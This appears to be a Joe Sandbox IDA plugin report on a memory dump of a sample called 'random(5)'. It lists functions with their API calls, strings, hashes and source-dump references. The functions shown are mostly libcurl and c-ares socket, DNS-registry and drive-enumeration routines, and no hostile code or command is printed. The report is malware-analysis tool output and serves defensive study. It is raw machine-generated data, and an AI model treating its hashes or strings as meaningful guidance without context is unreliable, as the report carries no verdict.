System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00EEAA0F
PrimaryDNSSuffix, xrefs: 00EEAC6B, 00EEACAE
Software\Policies\Microsoft\System\DNSClient, xrefs: 00EEAC3C
System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, xrefs: 00EEAD00
SearchList, xrefs: 00EEAA46, 00EEAA91, 00EEABA7, 00EEABEA, 00EEAE4E, 00EEAE9D
Domain, xrefs: 00EEAAE3, 00EEAB2A, 00EEAF5D, 00EEAFAC
Software\Policies\Microsoft\Windows NT\DNSClient, xrefs: 00EEAB78
DhcpDomain, xrefs: 00EEB06C, 00EEB0BB

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: QueryValue$Open$CloseEnum
String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
API String ID: 4217438148-1047472027
Opcode ID: 268bff808e2daf0f72d58ae69711318bafaa57b69df644a6e681329d7329cdf1
Instruction ID: ada18805aa40768b63984d9f9b0ead527dacf8b8a6345e479e17a375347b7808
Opcode Fuzzy Hash: 268bff808e2daf0f72d58ae69711318bafaa57b69df644a6e681329d7329cdf1
Instruction Fuzzy Hash: F772E5B1604385AFE3209F25CC81B6BB7E8AF85704F19582CF985E72A1E771E844CB53

Function 00E6A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00E6A831

Strings

Trying [%s]:%d..., xrefs: 00E6A689
@, xrefs: 00E6A8F4
Name '%s' family %i resolved to '%s' family %i, xrefs: 00E6ADAC
Bind to local port %d failed, trying next, xrefs: 00E6AFE5
@, xrefs: 00E6AC42
cf-socket.c, xrefs: 00E6A5CD, 00E6A735
Couldn't bind to '%s' with errno %d: %s, xrefs: 00E6AE1F
cf_socket_open() -> %d, fd=%d, xrefs: 00E6A796
Local port: %hu, xrefs: 00E6AF28
Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00E6AD0A
bind failed with errno %d: %s, xrefs: 00E6B080
Local Interface %s is ip %s using address family %i, xrefs: 00E6AE60
Could not set TCP_NODELAY: %s, xrefs: 00E6A871
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00E6A6CE
Trying %s:%d..., xrefs: 00E6A7C2, 00E6A7DE

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: setsockopt
String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3981526788-2373386790
Opcode ID: ad2b98b06b53ba2f2c04d0e0850f1092af65102f72c63419e97d78b478fc7020
Instruction ID: e43088af26f6d3b289c3ea003630b02daa489a9a6f3b9a589dec7ad56d0a0867
Opcode Fuzzy Hash: ad2b98b06b53ba2f2c04d0e0850f1092af65102f72c63419e97d78b478fc7020
Instruction Fuzzy Hash: 056229719483419BE720CF14E846BABB7E4BF90358F08652DF988B7252E771E844CB93

Function 00EF9740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00EF9946
RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00EF9974
RegCloseKey.KERNELBASE(?), ref: 00EF998B

Strings

\hos, xrefs: 00EF999A
CARES_HOSTS, xrefs: 00EF9788
#, xrefs: 00EF9A3F
#, xrefs: 00EF9B9D
System\CurrentControlSet\Services\Tcpip\Parameters, xrefs: 00EF993C
sts, xrefs: 00EF99A2
DatabasePath, xrefs: 00EF996B

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
API String ID: 3677997916-4129964100
Opcode ID: da8b22157ef3e2b5e488a05af165d863aa05a44f1a5ad0dc247cc701d934a7dd
Instruction ID: 89ac7975bfb93f02898719a494573e8b76f69e6f71a765670516aa604c30960d
Opcode Fuzzy Hash: da8b22157ef3e2b5e488a05af165d863aa05a44f1a5ad0dc247cc701d934a7dd
Instruction Fuzzy Hash: DA32D8B59042456BEB11AB25EC42B3B76D4AF94318F085438FA49B7263F732ED14C793

Function 00E68B50 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 269
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,?,00000001), ref: 00E68C30
SleepEx.KERNELBASE(00000000,00000000), ref: 00E68CF3

Strings

local address %s port %d..., xrefs: 00E68C7F
not connected yet, xrefs: 00E68BDC
cf-socket.c, xrefs: 00E68EDF
connect to %s port %u from %s port %d failed: %s, xrefs: 00E68E78
connected, xrefs: 00E68DA7

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: Sleepconnect
String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
API String ID: 238548546-879669977
Opcode ID: 6f88118d593e75d1ca8d51d7cff29c9099e602169a37f63936d13e24acb1c7df
Instruction ID: d19d847dfb7197ca0412234ae13117fb4c780b4dffa9e548d18324c0b3fc4bef
Opcode Fuzzy Hash: 6f88118d593e75d1ca8d51d7cff29c9099e602169a37f63936d13e24acb1c7df
Instruction Fuzzy Hash: 38B10474644305AFD710CF24EE85BA6B7E4AF51398F04A72CE8696B2D2DB70EC44C762

Function 00E32F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE ref: 00E32FED
RegEnumKeyExA.KERNELBASE ref: 00E331A5

Strings

d, xrefs: 00E32FA0

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: EnumOpen
String ID: d
API String ID: 3231578192-2564639436
Opcode ID: ae1268ad6b63aff72a1594a23d76b3a2d19677bb49300872d25ed9508f72f9cc
Instruction ID: 23fe3dbdda456d0b1ecd6e5f5976de7988c3d0c067ffc4b98698b731f34b1c3b
Opcode Fuzzy Hash: ae1268ad6b63aff72a1594a23d76b3a2d19677bb49300872d25ed9508f72f9cc
Instruction Fuzzy Hash: BF71A4B490431A9FDB10DF69D58479EBBF0BF84308F10885DE898A7355D7749A88CF92

Function 00E376A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32(multi.c,?,?,?,N=,00000000,?,?,00E407BF), ref: 00E376EB

Strings

send, xrefs: 00E3770B, 00E3772A
N=, xrefs: 00E376A3
LIMIT %s:%d %s reached memlimit, xrefs: 00E37712, 00E37731
SEND %s:%d send(%lu) = %ld, xrefs: 00E376F8
multi.c, xrefs: 00E376DD, 00E376E9

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: send
String ID: LIMIT %s:%d %s reached memlimit$N=$SEND %s:%d send(%lu) = %ld$multi.c$send
API String ID: 2809346765-2907172669
Opcode ID: c656f859e3b76be44a01a378f721ae6118344393e7b968b5b86ba29b3768bb1b
Instruction ID: fe8ee83e74be4122b0b0e348f11137531043c10e513c8b415de0cc59931c8605
Opcode Fuzzy Hash: c656f859e3b76be44a01a378f721ae6118344393e7b968b5b86ba29b3768bb1b
Instruction Fuzzy Hash: BE1101F1A18304ABD2319B16AC9EE273F9CDBC2B68F15190DB84826212E6619C09C6B1

Function 00E69290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00E6935D
setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00E69388

Strings

send(len=%zu) -> %d, err=%d, xrefs: 00E69447
Send failure: %s, xrefs: 00E693FB
cf-socket.c, xrefs: 00E692CF

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: Ioctlsetsockopt
String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
API String ID: 1903391676-2691795271
Opcode ID: eb7484acd092441daa8a31d312f917258bc58629b9384c8078b13a6ef12c0d03
Instruction ID: 1946974e187897c7d0a48b99ed1796f8265b25f7b2fd368c0263059211898971
Opcode Fuzzy Hash: eb7484acd092441daa8a31d312f917258bc58629b9384c8078b13a6ef12c0d03
Instruction Fuzzy Hash: F751EF70644305ABD710DF24C881FAAB7A9FF84318F149529FD58AB293EB70E991CB91

Function 00E37770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32(?,?,?,?), ref: 00E377BA

Strings

recv, xrefs: 00E377DB, 00E377FA
RECV %s:%d recv(%lu) = %ld, xrefs: 00E377C8
LIMIT %s:%d %s reached memlimit, xrefs: 00E377E2, 00E37801

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: recv
String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
API String ID: 1507349165-640788491
Opcode ID: 9c7579762667fb3f1135b26f4a78c866e58a3e29584667a0712c8599b61c2725
Instruction ID: cdcf0dc08ceee904a47d06569d92bddd925a5c03c2427d6dd5f845f67083a0c5
Opcode Fuzzy Hash: 9c7579762667fb3f1135b26f4a78c866e58a3e29584667a0712c8599b61c2725
Instruction Fuzzy Hash: 941123F4A093547BE1309A16AC4EE2B3F9CDBC6B68F15191DF88873311E6619C09C6B2

Function 00E375E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32(?,?,?), ref: 00E37618

Strings

LIMIT %s:%d %s reached memlimit, xrefs: 00E3764A, 00E37669
socket, xrefs: 00E37643, 00E37662
FD %s:%d socket() = %d, xrefs: 00E3762E

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000181D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001825000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.00000000018FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.0000000001915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260003737.0000000001916000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260209296.0000000001ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2260228637.0000000001AD0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e30000_random(5).jbxd

Similarity

API ID: socket
String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
API String ID: 98920635-842387772
Opcode ID: 127fa7152129f462702a2663f4d4d02122e1b7beb6e3d0338b2b9b89f02fc2c7
Instruction ID: ae977c6fca39d772e4219837b4b57f48722b8ade49843dcc0e3d5367af5dfe0b
Opcode Fuzzy Hash: 127fa7152129f462702a2663f4d4d02122e1b7beb6e3d0338b2b9b89f02fc2c7
Instruction Fuzzy Hash: 831188F2A0421167D731566BAC1BE8B3F88DFC2728F05191CF850A62A2D222CC5DD3F0

Function 06E70AD2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F
4%a, xrefs: 06E70ABA

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\$4%a
API String ID: 999431828-2066733330
Opcode ID: a57e510a54f2b68f75c619356f071dbf96db67d8885d999953ecfde66524c54a
Instruction ID: 2d87de7d6893674f7ed083bc5842898adc6cccb4e2dff9f7a7a00f7fa7836ab4
Opcode Fuzzy Hash: a57e510a54f2b68f75c619356f071dbf96db67d8885d999953ecfde66524c54a
Instruction Fuzzy Hash: 5B21E4EB44C311FDF7C2C1805B54AFA6A2EF7C6335B30A462B403E6606E3A46B4D11B0

Function 06E70AAD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLogicalDrives.KERNELBASE(?,?,3125B08D), ref: 06E70C0A

Strings

A:\, xrefs: 06E70B6F
4%a, xrefs: 06E70ABA

Memory Dump Source

Source File: 00000000.00000002.2261622896.0000000006E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_random(5).jbxd

Similarity

API ID: DrivesLogical
String ID: A:\$4%a
API String ID: 999431828-2066733330
Opcode ID: feb96c562a6db60104c11bba474be012960cd4e76fefceea2810e343db55c384
Instruction ID: 60f5bd638784ea3007c33462cf9b74597f9c3ffc5b6be0bc72df1456be6cfb08
Opcode Fuzzy Hash: feb96c562a6db60104c11bba474be012960cd4e76fefceea2810e343db55c384
Instruction Fuzzy Hash: 3C21E5EB44C305FEB3C2C5809754AFA6B2EF6C6335730A062B403D6606E3A42B0D56B0

Function 00E6A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getsockname.WS2_32(?,?,00000080), ref: 00E6A1C7

Strings

ssloc inet_ntop() failed with errno %d: %s, xrefs: 00E6A23B
getsockname() failed with errno %d: %s, xrefs: 00E6A1F0

Memory Dump Source

Source File: 00000000.00000002.2258884895.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true

Associated: 00000000.00000002.2258827624.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001576000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258884895.0000000001578000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259623863.000000000157B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000157D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmpDownload File
